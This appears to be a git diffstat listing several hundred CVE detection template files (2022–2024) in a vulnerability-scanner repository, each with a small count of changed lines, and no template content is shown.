http/cves/2022/CVE-2022-34049.yaml | 2 +- http/cves/2022/CVE-2022-34093.yaml | 2 +- http/cves/2022/CVE-2022-34094.yaml | 2 +- http/cves/2022/CVE-2022-34121.yaml | 2 +- http/cves/2022/CVE-2022-34305.yaml | 4 ++-- http/cves/2022/CVE-2022-34328.yaml | 2 +- http/cves/2022/CVE-2022-34487.yaml | 2 +- http/cves/2022/CVE-2022-34534.yaml | 2 +- http/cves/2022/CVE-2022-34576.yaml | 2 +- http/cves/2022/CVE-2022-3477.yaml | 2 +- http/cves/2022/CVE-2022-3484.yaml | 2 +- http/cves/2022/CVE-2022-3506.yaml | 2 +- http/cves/2022/CVE-2022-35151.yaml | 2 +- http/cves/2022/CVE-2022-35416.yaml | 4 ++-- http/cves/2022/CVE-2022-35493.yaml | 2 +- http/cves/2022/CVE-2022-35507.yaml | 2 +- http/cves/2022/CVE-2022-3590.yaml | 2 +- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/cves/2022/CVE-2022-36446.yaml | 2 +- http/cves/2022/CVE-2022-36537.yaml | 2 +- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36804.yaml | 2 +- http/cves/2022/CVE-2022-36883.yaml | 2 +- http/cves/2022/CVE-2022-36923.yaml | 4 ++-- http/cves/2022/CVE-2022-37190.yaml | 2 +- http/cves/2022/CVE-2022-37191.yaml | 2 +- http/cves/2022/CVE-2022-37299.yaml | 2 +- http/cves/2022/CVE-2022-3766.yaml | 2 +- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-37932.yaml | 4 ++-- http/cves/2022/CVE-2022-3800.yaml | 2 +- http/cves/2022/CVE-2022-3805.yaml | 2 +- http/cves/2022/CVE-2022-38130.yaml | 4 ++-- http/cves/2022/CVE-2022-38131.yaml | 4 ++-- http/cves/2022/CVE-2022-38295.yaml | 2 +- http/cves/2022/CVE-2022-38296.yaml | 4 ++-- http/cves/2022/CVE-2022-38463.yaml | 4 ++-- http/cves/2022/CVE-2022-38467.yaml | 2 +- http/cves/2022/CVE-2022-38553.yaml | 2 +- http/cves/2022/CVE-2022-38627.yaml | 2 +- http/cves/2022/CVE-2022-38637.yaml | 2 +- http/cves/2022/CVE-2022-3869.yaml | 2 +- http/cves/2022/CVE-2022-38812.yaml | 2 +- http/cves/2022/CVE-2022-38870.yaml | 2 +- http/cves/2022/CVE-2022-39048.yaml | 2 +- http/cves/2022/CVE-2022-39195.yaml | 4 ++-- http/cves/2022/CVE-2022-3934.yaml | 2 +- http/cves/2022/CVE-2022-3980.yaml | 2 +- http/cves/2022/CVE-2022-3982.yaml | 2 +- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-40022.yaml | 2 +- http/cves/2022/CVE-2022-40047.yaml | 2 +- http/cves/2022/CVE-2022-40127.yaml | 2 +- http/cves/2022/CVE-2022-40359.yaml | 2 +- http/cves/2022/CVE-2022-4057.yaml | 2 +- http/cves/2022/CVE-2022-40624.yaml | 2 +- http/cves/2022/CVE-2022-4063.yaml | 2 +- http/cves/2022/CVE-2022-40684.yaml | 2 +- http/cves/2022/CVE-2022-40843.yaml | 2 +- http/cves/2022/CVE-2022-40881.yaml | 2 +- http/cves/2022/CVE-2022-41441.yaml | 2 +- http/cves/2022/CVE-2022-41473.yaml | 2 +- http/cves/2022/CVE-2022-41800.yaml | 2 +- http/cves/2022/CVE-2022-42094.yaml | 2 +- http/cves/2022/CVE-2022-42095.yaml | 2 +- http/cves/2022/CVE-2022-42096.yaml | 2 +- http/cves/2022/CVE-2022-42118.yaml | 2 +- http/cves/2022/CVE-2022-42149.yaml | 2 +- http/cves/2022/CVE-2022-4260.yaml | 2 +- http/cves/2022/CVE-2022-42747.yaml | 2 +- http/cves/2022/CVE-2022-42748.yaml | 2 +- http/cves/2022/CVE-2022-42749.yaml | 2 +- http/cves/2022/CVE-2022-4301.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 2 +- http/cves/2022/CVE-2022-43015.yaml | 2 +- http/cves/2022/CVE-2022-43017.yaml | 2 +- http/cves/2022/CVE-2022-43018.yaml | 2 +- http/cves/2022/CVE-2022-4306.yaml | 2 +- http/cves/2022/CVE-2022-43164.yaml | 2 +- http/cves/2022/CVE-2022-43167.yaml | 2 +- http/cves/2022/CVE-2022-43169.yaml | 2 +- http/cves/2022/CVE-2022-43185.yaml | 2 +- http/cves/2022/CVE-2022-4320.yaml | 2 +- http/cves/2022/CVE-2022-4321.yaml | 2 +- http/cves/2022/CVE-2022-4325.yaml | 2 +- http/cves/2022/CVE-2022-4375.yaml | 2 +- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2022/CVE-2022-43939.yaml | 4 ++-- http/cves/2022/CVE-2022-44290.yaml | 2 +- http/cves/2022/CVE-2022-44291.yaml | 2 +- http/cves/2022/CVE-2022-44356.yaml | 2 +- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44947.yaml | 2 +- http/cves/2022/CVE-2022-44948.yaml | 2 +- http/cves/2022/CVE-2022-44949.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-44951.yaml | 2 +- http/cves/2022/CVE-2022-44952.yaml | 2 +- http/cves/2022/CVE-2022-44957.yaml | 2 +- http/cves/2022/CVE-2022-45037.yaml | 2 +- http/cves/2022/CVE-2022-45038.yaml | 2 +- http/cves/2022/CVE-2022-45269.yaml | 2 +- http/cves/2022/CVE-2022-45362.yaml | 2 +- http/cves/2022/CVE-2022-45365.yaml | 2 +- http/cves/2022/CVE-2022-45699.yaml | 2 +- http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2022/CVE-2022-45835.yaml | 2 +- http/cves/2022/CVE-2022-46020.yaml | 2 +- http/cves/2022/CVE-2022-46071.yaml | 2 +- http/cves/2022/CVE-2022-46073.yaml | 2 +- http/cves/2022/CVE-2022-46443.yaml | 2 +- http/cves/2022/CVE-2022-46888.yaml | 2 +- http/cves/2022/CVE-2022-46934.yaml | 2 +- http/cves/2022/CVE-2022-47075.yaml | 2 +- http/cves/2022/CVE-2022-47501.yaml | 2 +- http/cves/2022/CVE-2022-47966.yaml | 2 +- http/cves/2022/CVE-2022-48164.yaml | 2 +- http/cves/2022/CVE-2022-48165.yaml | 2 +- http/cves/2022/CVE-2022-48166.yaml | 2 +- http/cves/2022/CVE-2022-48197.yaml | 2 +- http/cves/2022/CVE-2022-4897.yaml | 2 +- http/cves/2022/CVE-2022-4940.yaml | 4 ++-- http/cves/2023/CVE-2023-0099.yaml | 4 ++-- http/cves/2023/CVE-2023-0159.yaml | 2 +- http/cves/2023/CVE-2023-0236.yaml | 2 +- http/cves/2023/CVE-2023-0261.yaml | 2 +- http/cves/2023/CVE-2023-0334.yaml | 2 +- http/cves/2023/CVE-2023-0448.yaml | 2 +- http/cves/2023/CVE-2023-0514.yaml | 2 +- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0562.yaml | 2 +- http/cves/2023/CVE-2023-0563.yaml | 2 +- http/cves/2023/CVE-2023-0676.yaml | 2 +- http/cves/2023/CVE-2023-0678.yaml | 2 +- http/cves/2023/CVE-2023-0876.yaml | 2 +- http/cves/2023/CVE-2023-0900.yaml | 2 +- http/cves/2023/CVE-2023-0948.yaml | 2 +- http/cves/2023/CVE-2023-0968.yaml | 2 +- http/cves/2023/CVE-2023-1080.yaml | 2 +- http/cves/2023/CVE-2023-1177.yaml | 4 ++-- http/cves/2023/CVE-2023-1263.yaml | 2 +- http/cves/2023/CVE-2023-1315.yaml | 2 +- http/cves/2023/CVE-2023-1318.yaml | 2 +- http/cves/2023/CVE-2023-1362.yaml | 2 +- http/cves/2023/CVE-2023-1389.yaml | 4 ++-- http/cves/2023/CVE-2023-1546.yaml | 2 +- http/cves/2023/CVE-2023-1719.yaml | 2 +- http/cves/2023/CVE-2023-1730.yaml | 2 +- http/cves/2023/CVE-2023-1780.yaml | 2 +- http/cves/2023/CVE-2023-1890.yaml | 2 +- http/cves/2023/CVE-2023-1892.yaml | 2 +- http/cves/2023/CVE-2023-1893.yaml | 2 +- http/cves/2023/CVE-2023-20073.yaml | 2 +- http/cves/2023/CVE-2023-2009.yaml | 2 +- http/cves/2023/CVE-2023-2059.yaml | 2 +- http/cves/2023/CVE-2023-20864.yaml | 2 +- http/cves/2023/CVE-2023-20887.yaml | 2 +- http/cves/2023/CVE-2023-20888.yaml | 2 +- http/cves/2023/CVE-2023-2122.yaml | 2 +- http/cves/2023/CVE-2023-2130.yaml | 2 +- http/cves/2023/CVE-2023-22232.yaml | 2 +- http/cves/2023/CVE-2023-2224.yaml | 2 +- http/cves/2023/CVE-2023-2227.yaml | 2 +- http/cves/2023/CVE-2023-22478.yaml | 2 +- http/cves/2023/CVE-2023-22515.yaml | 4 ++-- http/cves/2023/CVE-2023-22518.yaml | 2 +- http/cves/2023/CVE-2023-2252.yaml | 2 +- http/cves/2023/CVE-2023-22621.yaml | 2 +- http/cves/2023/CVE-2023-22893.yaml | 2 +- http/cves/2023/CVE-2023-2309.yaml | 2 +- http/cves/2023/CVE-2023-23161.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23491.yaml | 2 +- http/cves/2023/CVE-2023-23897.yaml | 2 +- http/cves/2023/CVE-2023-24278.yaml | 2 +- http/cves/2023/CVE-2023-24322.yaml | 2 +- http/cves/2023/CVE-2023-24657.yaml | 2 +- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-24735.yaml | 2 +- http/cves/2023/CVE-2023-24737.yaml | 2 +- http/cves/2023/CVE-2023-2518.yaml | 2 +- http/cves/2023/CVE-2023-25194.yaml | 2 +- http/cves/2023/CVE-2023-25280.yaml | 2 +- http/cves/2023/CVE-2023-25346.yaml | 2 +- http/cves/2023/CVE-2023-25573.yaml | 2 +- http/cves/2023/CVE-2023-26035.yaml | 2 +- http/cves/2023/CVE-2023-26067.yaml | 2 +- http/cves/2023/CVE-2023-2624.yaml | 2 +- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-27008.yaml | 2 +- http/cves/2023/CVE-2023-27032.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- http/cves/2023/CVE-2023-27179.yaml | 2 +- http/cves/2023/CVE-2023-27292.yaml | 2 +- http/cves/2023/CVE-2023-2734.yaml | 2 +- http/cves/2023/CVE-2023-27351.yaml | 4 ++-- http/cves/2023/CVE-2023-2745.yaml | 2 +- http/cves/2023/CVE-2023-27482.yaml | 4 ++-- http/cves/2023/CVE-2023-27584.yaml | 2 +- http/cves/2023/CVE-2023-27587.yaml | 2 +- http/cves/2023/CVE-2023-27624.yaml | 4 ++-- http/cves/2023/CVE-2023-2779.yaml | 2 +- http/cves/2023/CVE-2023-27922.yaml | 2 +- http/cves/2023/CVE-2023-2796.yaml | 2 +- http/cves/2023/CVE-2023-2813.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 4 ++-- http/cves/2023/CVE-2023-28432.yaml | 2 +- http/cves/2023/CVE-2023-28665.yaml | 2 +- http/cves/2023/CVE-2023-29084.yaml | 2 +- http/cves/2023/CVE-2023-29204.yaml | 2 +- http/cves/2023/CVE-2023-29298.yaml | 2 +- http/cves/2023/CVE-2023-29300.yaml | 4 ++-- http/cves/2023/CVE-2023-29489.yaml | 2 +- http/cves/2023/CVE-2023-29506.yaml | 2 +- http/cves/2023/CVE-2023-29623.yaml | 2 +- http/cves/2023/CVE-2023-29827.yaml | 2 +- http/cves/2023/CVE-2023-29887.yaml | 2 +- http/cves/2023/CVE-2023-29923.yaml | 2 +- http/cves/2023/CVE-2023-30192.yaml | 2 +- http/cves/2023/CVE-2023-30210.yaml | 2 +- http/cves/2023/CVE-2023-30212.yaml | 2 +- http/cves/2023/CVE-2023-30258.yaml | 2 +- http/cves/2023/CVE-2023-30534.yaml | 2 +- http/cves/2023/CVE-2023-3077.yaml | 4 ++-- http/cves/2023/CVE-2023-30868.yaml | 2 +- http/cves/2023/CVE-2023-30869.yaml | 2 +- http/cves/2023/CVE-2023-31446.yaml | 2 +- http/cves/2023/CVE-2023-31465.yaml | 2 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/cves/2023/CVE-2023-3188.yaml | 2 +- http/cves/2023/CVE-2023-32068.yaml | 2 +- http/cves/2023/CVE-2023-3219.yaml | 2 +- http/cves/2023/CVE-2023-32235.yaml | 2 +- http/cves/2023/CVE-2023-32563.yaml | 4 ++-- http/cves/2023/CVE-2023-33193.yaml | 4 ++-- http/cves/2023/CVE-2023-33338.yaml | 2 +- http/cves/2023/CVE-2023-33405.yaml | 4 ++-- http/cves/2023/CVE-2023-33439.yaml | 2 +- http/cves/2023/CVE-2023-3345.yaml | 2 +- http/cves/2023/CVE-2023-3380.yaml | 4 ++-- http/cves/2023/CVE-2023-33831.yaml | 2 +- http/cves/2023/CVE-2023-33960.yaml | 2 +- http/cves/2023/CVE-2023-34124.yaml | 2 +- http/cves/2023/CVE-2023-34133.yaml | 2 +- http/cves/2023/CVE-2023-34192.yaml | 2 +- http/cves/2023/CVE-2023-34537.yaml | 2 +- http/cves/2023/CVE-2023-34599.yaml | 2 +- http/cves/2023/CVE-2023-34659.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34754.yaml | 2 +- http/cves/2023/CVE-2023-3479.yaml | 2 +- http/cves/2023/CVE-2023-34843.yaml | 2 +- http/cves/2023/CVE-2023-34960.yaml | 2 +- http/cves/2023/CVE-2023-34990.yaml | 2 +- http/cves/2023/CVE-2023-34993.yaml | 2 +- http/cves/2023/CVE-2023-35082.yaml | 2 +- http/cves/2023/CVE-2023-35156.yaml | 2 +- http/cves/2023/CVE-2023-35158.yaml | 2 +- http/cves/2023/CVE-2023-35160.yaml | 2 +- http/cves/2023/CVE-2023-35161.yaml | 2 +- http/cves/2023/CVE-2023-35162.yaml | 2 +- http/cves/2023/CVE-2023-3519.yaml | 4 ++-- http/cves/2023/CVE-2023-3521.yaml | 2 +- http/cves/2023/CVE-2023-35843.yaml | 2 +- http/cves/2023/CVE-2023-36144.yaml | 2 +- http/cves/2023/CVE-2023-36284.yaml | 2 +- http/cves/2023/CVE-2023-36287.yaml | 2 +- http/cves/2023/CVE-2023-36289.yaml | 2 +- http/cves/2023/CVE-2023-36306.yaml | 2 +- http/cves/2023/CVE-2023-36346.yaml | 2 +- http/cves/2023/CVE-2023-3710.yaml | 2 +- http/cves/2023/CVE-2023-3722.yaml | 2 +- http/cves/2023/CVE-2023-37265.yaml | 2 +- http/cves/2023/CVE-2023-37270.yaml | 2 +- http/cves/2023/CVE-2023-37474.yaml | 2 +- http/cves/2023/CVE-2023-37599.yaml | 2 +- http/cves/2023/CVE-2023-37645.yaml | 2 +- http/cves/2023/CVE-2023-37728.yaml | 2 +- http/cves/2023/CVE-2023-37979.yaml | 2 +- http/cves/2023/CVE-2023-37988.yaml | 2 +- http/cves/2023/CVE-2023-38035.yaml | 2 +- http/cves/2023/CVE-2023-38192.yaml | 2 +- http/cves/2023/CVE-2023-38194.yaml | 2 +- http/cves/2023/CVE-2023-3836.yaml | 2 +- http/cves/2023/CVE-2023-3843.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 2 +- http/cves/2023/CVE-2023-3844.yaml | 2 +- http/cves/2023/CVE-2023-3845.yaml | 2 +- http/cves/2023/CVE-2023-3846.yaml | 2 +- http/cves/2023/CVE-2023-3847.yaml | 2 +- http/cves/2023/CVE-2023-3848.yaml | 2 +- http/cves/2023/CVE-2023-3849.yaml | 2 +- http/cves/2023/CVE-2023-38501.yaml | 2 +- http/cves/2023/CVE-2023-38879.yaml | 2 +- http/cves/2023/CVE-2023-38952.yaml | 4 ++-- http/cves/2023/CVE-2023-38964.yaml | 2 +- http/cves/2023/CVE-2023-38992.yaml | 2 +- http/cves/2023/CVE-2023-39002.yaml | 2 +- http/cves/2023/CVE-2023-39007.yaml | 2 +- http/cves/2023/CVE-2023-39108.yaml | 2 +- http/cves/2023/CVE-2023-39109.yaml | 2 +- http/cves/2023/CVE-2023-39121.yaml | 2 +- http/cves/2023/CVE-2023-3936.yaml | 2 +- http/cves/2023/CVE-2023-39560.yaml | 2 +- http/cves/2023/CVE-2023-39598.yaml | 2 +- http/cves/2023/CVE-2023-39600.yaml | 2 +- http/cves/2023/CVE-2023-39650.yaml | 2 +- http/cves/2023/CVE-2023-39676.yaml | 2 +- http/cves/2023/CVE-2023-39700.yaml | 2 +- http/cves/2023/CVE-2023-3990.yaml | 2 +- http/cves/2023/CVE-2023-40208.yaml | 2 +- http/cves/2023/CVE-2023-40211.yaml | 2 +- http/cves/2023/CVE-2023-40355.yaml | 2 +- http/cves/2023/CVE-2023-40748.yaml | 2 +- http/cves/2023/CVE-2023-40749.yaml | 2 +- http/cves/2023/CVE-2023-40750.yaml | 2 +- http/cves/2023/CVE-2023-40751.yaml | 2 +- http/cves/2023/CVE-2023-40752.yaml | 2 +- http/cves/2023/CVE-2023-40753.yaml | 2 +- http/cves/2023/CVE-2023-40755.yaml | 2 +- http/cves/2023/CVE-2023-40779.yaml | 2 +- http/cves/2023/CVE-2023-4110.yaml | 2 +- http/cves/2023/CVE-2023-4115.yaml | 2 +- http/cves/2023/CVE-2023-4116.yaml | 2 +- http/cves/2023/CVE-2023-4136.yaml | 2 +- http/cves/2023/CVE-2023-4148.yaml | 2 +- http/cves/2023/CVE-2023-4151.yaml | 2 +- http/cves/2023/CVE-2023-41538.yaml | 2 +- http/cves/2023/CVE-2023-41597.yaml | 2 +- http/cves/2023/CVE-2023-41621.yaml | 2 +- http/cves/2023/CVE-2023-4168.yaml | 2 +- http/cves/2023/CVE-2023-4169.yaml | 2 +- http/cves/2023/CVE-2023-4173.yaml | 2 +- http/cves/2023/CVE-2023-41763.yaml | 2 +- http/cves/2023/CVE-2023-41954.yaml | 2 +- http/cves/2023/CVE-2023-4284.yaml | 2 +- http/cves/2023/CVE-2023-43208.yaml | 2 +- http/cves/2023/CVE-2023-43325.yaml | 2 +- http/cves/2023/CVE-2023-43326.yaml | 2 +- http/cves/2023/CVE-2023-43373.yaml | 2 +- http/cves/2023/CVE-2023-43374.yaml | 2 +- http/cves/2023/CVE-2023-43472.yaml | 2 +- http/cves/2023/CVE-2023-44012.yaml | 2 +- http/cves/2023/CVE-2023-4415.yaml | 2 +- http/cves/2023/CVE-2023-44352.yaml | 4 ++-- http/cves/2023/CVE-2023-44353.yaml | 4 ++-- http/cves/2023/CVE-2023-44393.yaml | 2 +- http/cves/2023/CVE-2023-4451.yaml | 2 +- http/cves/2023/CVE-2023-44812.yaml | 2 +- http/cves/2023/CVE-2023-4490.yaml | 2 +- http/cves/2023/CVE-2023-45038.yaml | 2 +- http/cves/2023/CVE-2023-4521.yaml | 2 +- http/cves/2023/CVE-2023-4547.yaml | 2 +- http/cves/2023/CVE-2023-45542.yaml | 2 +- http/cves/2023/CVE-2023-45671.yaml | 2 +- http/cves/2023/CVE-2023-45826.yaml | 2 +- http/cves/2023/CVE-2023-45852.yaml | 2 +- http/cves/2023/CVE-2023-45855.yaml | 2 +- http/cves/2023/CVE-2023-4634.yaml | 2 +- http/cves/2023/CVE-2023-46347.yaml | 2 +- http/cves/2023/CVE-2023-46359.yaml | 2 +- http/cves/2023/CVE-2023-46455.yaml | 2 +- http/cves/2023/CVE-2023-46732.yaml | 2 +- http/cves/2023/CVE-2023-46747.yaml | 2 +- http/cves/2023/CVE-2023-46818.yaml | 2 +- http/cves/2023/CVE-2023-47115.yaml | 2 +- http/cves/2023/CVE-2023-47117.yaml | 2 +- http/cves/2023/CVE-2023-47684.yaml | 2 +- http/cves/2023/CVE-2023-47873.yaml | 2 +- http/cves/2023/CVE-2023-48084.yaml | 2 +- http/cves/2023/CVE-2023-48777.yaml | 2 +- http/cves/2023/CVE-2023-49489.yaml | 2 +- http/cves/2023/CVE-2023-49494.yaml | 2 +- http/cves/2023/CVE-2023-4966.yaml | 4 ++-- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-5003.yaml | 2 +- http/cves/2023/CVE-2023-50290.yaml | 4 ++-- http/cves/2023/CVE-2023-50578.yaml | 2 +- http/cves/2023/CVE-2023-50719.yaml | 2 +- http/cves/2023/CVE-2023-50720.yaml | 2 +- http/cves/2023/CVE-2023-52085.yaml | 2 +- http/cves/2023/CVE-2023-5222.yaml | 2 +- http/cves/2023/CVE-2023-5244.yaml | 4 ++-- http/cves/2023/CVE-2023-5360.yaml | 4 ++-- http/cves/2023/CVE-2023-5375.yaml | 2 +- http/cves/2023/CVE-2023-5556.yaml | 2 +- http/cves/2023/CVE-2023-5558.yaml | 2 +- http/cves/2023/CVE-2023-5559.yaml | 2 +- http/cves/2023/CVE-2023-5561.yaml | 2 +- http/cves/2023/CVE-2023-5815.yaml | 2 +- http/cves/2023/CVE-2023-5830.yaml | 2 +- http/cves/2023/CVE-2023-5863.yaml | 2 +- http/cves/2023/CVE-2023-6000.yaml | 2 +- http/cves/2023/CVE-2023-6018.yaml | 2 +- http/cves/2023/CVE-2023-6020.yaml | 2 +- http/cves/2023/CVE-2023-6021.yaml | 2 +- http/cves/2023/CVE-2023-6023.yaml | 2 +- http/cves/2023/CVE-2023-6063.yaml | 2 +- http/cves/2023/CVE-2023-6266.yaml | 4 ++-- http/cves/2023/CVE-2023-6275.yaml | 2 +- http/cves/2023/CVE-2023-6380.yaml | 2 +- http/cves/2023/CVE-2023-6389.yaml | 2 +- http/cves/2023/CVE-2023-6421.yaml | 2 +- http/cves/2023/CVE-2023-6505.yaml | 2 +- http/cves/2023/CVE-2023-6568.yaml | 2 +- http/cves/2023/CVE-2023-6623.yaml | 4 ++-- http/cves/2023/CVE-2023-6655.yaml | 2 +- http/cves/2023/CVE-2023-6697.yaml | 2 +- http/cves/2023/CVE-2023-6786.yaml | 2 +- http/cves/2023/CVE-2023-6875.yaml | 2 +- http/cves/2023/CVE-2023-6895.yaml | 2 +- http/cves/2023/CVE-2023-6977.yaml | 2 +- http/cves/2023/CVE-2023-6989.yaml | 2 +- http/cves/2023/CVE-2023-7028.yaml | 4 ++-- http/cves/2023/CVE-2023-7116.yaml | 2 +- http/cves/2023/CVE-2023-7164.yaml | 4 ++-- http/cves/2023/CVE-2023-7246.yaml | 2 +- http/cves/2024/CVE-2024-0200.yaml | 2 +- http/cves/2024/CVE-2024-0204.yaml | 2 +- http/cves/2024/CVE-2024-0250.yaml | 2 +- http/cves/2024/CVE-2024-0337.yaml | 2 +- http/cves/2024/CVE-2024-0593.yaml | 2 +- http/cves/2024/CVE-2024-0692.yaml | 4 ++-- http/cves/2024/CVE-2024-0799.yaml | 2 +- http/cves/2024/CVE-2024-0801.yaml | 2 +- http/cves/2024/CVE-2024-0881.yaml | 2 +- http/cves/2024/CVE-2024-0939.yaml | 2 +- http/cves/2024/CVE-2024-10081.yaml | 2 +- http/cves/2024/CVE-2024-10146.yaml | 2 +- http/cves/2024/CVE-2024-1021.yaml | 4 ++-- http/cves/2024/CVE-2024-10708.yaml | 4 ++-- http/cves/2024/CVE-2024-10783.yaml | 2 +- http/cves/2024/CVE-2024-10812.yaml | 2 +- http/cves/2024/CVE-2024-10908.yaml | 2 +- http/cves/2024/CVE-2024-10914.yaml | 4 ++-- http/cves/2024/CVE-2024-11238.yaml | 2 +- http/cves/2024/CVE-2024-11303.yaml | 2 +- http/cves/2024/CVE-2024-11320.yaml | 2 +- http/cves/2024/CVE-2024-11396.yaml | 2 +- http/cves/2024/CVE-2024-11587.yaml | 2 +- http/cves/2024/CVE-2024-11740.yaml | 2 +- http/cves/2024/CVE-2024-1183.yaml | 2 +- http/cves/2024/CVE-2024-11921.yaml | 2 +- http/cves/2024/CVE-2024-11972.yaml | 2 +- http/cves/2024/CVE-2024-1209.yaml | 2 +- http/cves/2024/CVE-2024-12987.yaml | 2 +- http/cves/2024/CVE-2024-13126.yaml | 2 +- http/cves/2024/CVE-2024-13160.yaml | 2 +- http/cves/2024/CVE-2024-13161.yaml | 2 +- http/cves/2024/CVE-2024-13322.yaml | 2 +- http/cves/2024/CVE-2024-13496.yaml | 2 +- http/cves/2024/CVE-2024-13624.yaml | 2 +- http/cves/2024/CVE-2024-13726.yaml | 2 +- http/cves/2024/CVE-2024-13853.yaml | 2 +- http/cves/2024/CVE-2024-13888.yaml | 2 +- http/cves/2024/CVE-2024-13979.yaml | 2 +- http/cves/2024/CVE-2024-1483.yaml | 2 +- http/cves/2024/CVE-2024-1561.yaml | 2 +- http/cves/2024/CVE-2024-20404.yaml | 4 ++-- http/cves/2024/CVE-2024-20419.yaml | 2 +- http/cves/2024/CVE-2024-20439.yaml | 4 ++-- http/cves/2024/CVE-2024-2053.yaml | 2 +- http/cves/2024/CVE-2024-20767.yaml | 4 ++-- http/cves/2024/CVE-2024-21136.yaml | 2 +- http/cves/2024/CVE-2024-21485.yaml | 2 +- http/cves/2024/CVE-2024-21644.yaml | 2 +- http/cves/2024/CVE-2024-21645.yaml | 2 +- http/cves/2024/CVE-2024-21650.yaml | 2 +- http/cves/2024/CVE-2024-21683.yaml | 2 +- http/cves/2024/CVE-2024-21887.yaml | 2 +- http/cves/2024/CVE-2024-22207.yaml | 2 +- http/cves/2024/CVE-2024-22319.yaml | 2 +- http/cves/2024/CVE-2024-22320.yaml | 2 +- http/cves/2024/CVE-2024-23334.yaml | 2 +- http/cves/2024/CVE-2024-2340.yaml | 2 +- http/cves/2024/CVE-2024-24112.yaml | 2 +- http/cves/2024/CVE-2024-24131.yaml | 2 +- http/cves/2024/CVE-2024-24565.yaml | 2 +- http/cves/2024/CVE-2024-2473.yaml | 2 +- http/cves/2024/CVE-2024-24759.yaml | 4 ++-- http/cves/2024/CVE-2024-24763.yaml | 2 +- http/cves/2024/CVE-2024-24809.yaml | 4 ++-- http/cves/2024/CVE-2024-24882.yaml | 4 ++-- http/cves/2024/CVE-2024-25608.yaml | 4 ++-- http/cves/2024/CVE-2024-25723.yaml | 2 +- http/cves/2024/CVE-2024-25735.yaml | 2 +- http/cves/2024/CVE-2024-25852.yaml | 4 ++-- http/cves/2024/CVE-2024-2621.yaml | 2 +- http/cves/2024/CVE-2024-26331.yaml | 2 +- http/cves/2024/CVE-2024-27564.yaml | 2 +- http/cves/2024/CVE-2024-2771.yaml | 2 +- http/cves/2024/CVE-2024-27718.yaml | 2 +- http/cves/2024/CVE-2024-2782.yaml | 2 +- http/cves/2024/CVE-2024-27956.yaml | 2 +- http/cves/2024/CVE-2024-28200.yaml | 4 ++-- http/cves/2024/CVE-2024-28253.yaml | 2 +- http/cves/2024/CVE-2024-28397.yaml | 4 ++-- http/cves/2024/CVE-2024-2862.yaml | 4 ++-- http/cves/2024/CVE-2024-28623.yaml | 2 +- http/cves/2024/CVE-2024-2863.yaml | 4 ++-- http/cves/2024/CVE-2024-28734.yaml | 2 +- http/cves/2024/CVE-2024-29028.yaml | 2 +- http/cves/2024/CVE-2024-29137.yaml | 4 ++-- http/cves/2024/CVE-2024-29138.yaml | 4 ++-- http/cves/2024/CVE-2024-29198.yaml | 2 +- http/cves/2024/CVE-2024-29269.yaml | 4 ++-- http/cves/2024/CVE-2024-29272.yaml | 4 ++-- http/cves/2024/CVE-2024-2928.yaml | 4 ++-- http/cves/2024/CVE-2024-29792.yaml | 4 ++-- http/cves/2024/CVE-2024-29824.yaml | 2 +- http/cves/2024/CVE-2024-29868.yaml | 2 +- http/cves/2024/CVE-2024-29889.yaml | 4 ++-- http/cves/2024/CVE-2024-29931.yaml | 4 ++-- http/cves/2024/CVE-2024-29972.yaml | 2 +- http/cves/2024/CVE-2024-29973.yaml | 2 +- http/cves/2024/CVE-2024-30163.yaml | 2 +- http/cves/2024/CVE-2024-30194.yaml | 4 ++-- http/cves/2024/CVE-2024-30269.yaml | 2 +- http/cves/2024/CVE-2024-3032.yaml | 2 +- http/cves/2024/CVE-2024-30569.yaml | 2 +- http/cves/2024/CVE-2024-30570.yaml | 2 +- http/cves/2024/CVE-2024-3097.yaml | 2 +- http/cves/2024/CVE-2024-3136.yaml | 2 +- http/cves/2024/CVE-2024-31621.yaml | 2 +- http/cves/2024/CVE-2024-31849.yaml | 2 +- http/cves/2024/CVE-2024-31982.yaml | 2 +- http/cves/2024/CVE-2024-32113.yaml | 2 +- http/cves/2024/CVE-2024-32231.yaml | 4 ++-- http/cves/2024/CVE-2024-32238.yaml | 4 ++-- http/cves/2024/CVE-2024-3234.yaml | 4 ++-- http/cves/2024/CVE-2024-32399.yaml | 4 ++-- http/cves/2024/CVE-2024-32651.yaml | 2 +- http/cves/2024/CVE-2024-3273.yaml | 2 +- http/cves/2024/CVE-2024-32735.yaml | 2 +- http/cves/2024/CVE-2024-32737.yaml | 2 +- http/cves/2024/CVE-2024-32738.yaml | 2 +- http/cves/2024/CVE-2024-32964.yaml | 2 +- http/cves/2024/CVE-2024-3300.yaml | 2 +- http/cves/2024/CVE-2024-33113.yaml | 2 +- http/cves/2024/CVE-2024-33326.yaml | 2 +- http/cves/2024/CVE-2024-33575.yaml | 2 +- http/cves/2024/CVE-2024-33605.yaml | 2 +- http/cves/2024/CVE-2024-33610.yaml | 2 +- http/cves/2024/CVE-2024-33939.yaml | 4 ++-- http/cves/2024/CVE-2024-3400.yaml | 4 ++-- http/cves/2024/CVE-2024-34061.yaml | 2 +- 